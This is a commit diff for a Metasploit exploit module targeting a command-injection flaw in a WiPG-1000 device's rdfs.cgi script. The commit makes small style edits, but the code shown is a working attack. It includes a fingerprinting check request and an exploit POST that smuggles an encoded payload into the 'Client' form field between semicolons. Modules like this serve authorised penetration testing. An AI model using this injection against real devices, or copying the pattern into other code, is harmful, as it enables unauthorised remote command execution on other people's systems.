Skip to content

Commit d3aba84

Browse files
committed
Make minor changes
1 parent 35bc1fb commit d3aba84

File tree

1 file changed

+5
-7
lines changed

1 file changed

+5
-7
lines changed

modules/exploits/linux/http/wipg1000_cmd_injection.rb

Lines changed: 5 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -3,8 +3,6 @@
33
# Current source: https://github.com/rapid7/metasploit-framework
44
##
55

6-
require 'msf/core'
7-
86
class MetasploitModule < Msf::Exploit::Remote
97
Rank = ExcellentRanking
108

@@ -50,20 +48,20 @@ def initialize(info={})
5048
def check
5149
res = send_request_cgi({
5250
'method' => 'GET',
53-
'uri' => normalize_uri('/cgi-bin/rdfs.cgi')
51+
'uri' => '/cgi-bin/rdfs.cgi'
5452
})
55-
if res and res.body =~ /Follow administrator instructions to enter the complete path/ then
56-
return Exploit::CheckCode::Appears
53+
if res && res.body.include?("Follow administrator instructions to enter the complete path")
54+
Exploit::CheckCode::Appears
5755
else
58-
return Exploit::CheckCode::Safe
56+
Exploit::CheckCode::Safe
5957
end
6058
end
6159

6260
def exploit
6361
print_status('Sending request')
6462
send_request_cgi(
6563
'method' => 'POST',
66-
'uri' => normalize_uri('/cgi-bin/rdfs.cgi'),
64+
'uri' => '/cgi-bin/rdfs.cgi',
6765
'vars_post' => {
6866
'Client' => ";#{payload.encoded};",
6967
'Download' => 'Download'

0 commit comments

Comments
 (0)